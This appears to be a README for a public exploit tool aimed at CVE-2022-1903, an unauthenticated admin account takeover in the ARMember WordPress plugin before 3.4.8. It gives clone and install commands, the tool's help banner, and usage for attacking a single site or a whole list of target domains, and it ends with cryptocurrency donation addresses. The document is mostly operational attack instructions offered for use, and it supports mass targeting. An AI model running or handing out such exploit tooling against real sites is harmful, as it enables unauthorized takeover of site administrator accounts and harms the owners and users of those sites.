Title: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
Author: Cyllective [ https://cyllective.com/ ]
CVE: CVE-2022-1903
git clone https://github.com/biulove0x/CVE-2022-1903.git
cd CVE-2022-1903/
python3 -m pip install -r requirements.txt
$ python3 ARMember.py --help
###########################################
# @author : biulove0x #
# @name : WP Plugins ARMember Exploiter #
# @cve : CVE-2022-1903 #
###########################################
usage: armember.py [-h] [-t example.com] [-l target.txt]
CVE-2022-1903 [ ARMember < 3.4.8 - Unauthenticated Admin Account Takeover ]
optional arguments:
-h, --help show this help message and exit
-t example.com Single target
-l target.txt Multiple target
$ python3 ARMember.py -t http://example.com/
$ cat domains.txt
http://example.com/
https://examples.com/
$ python3 ARMember.py -l target.txt
BTC : bc1qst09sxcnq97a4wgsqvpkg4fxyjczvs3xe7278h
BNB : bnb1jhp2hv9utr8u97387p35fmftgr8wpjp39altz0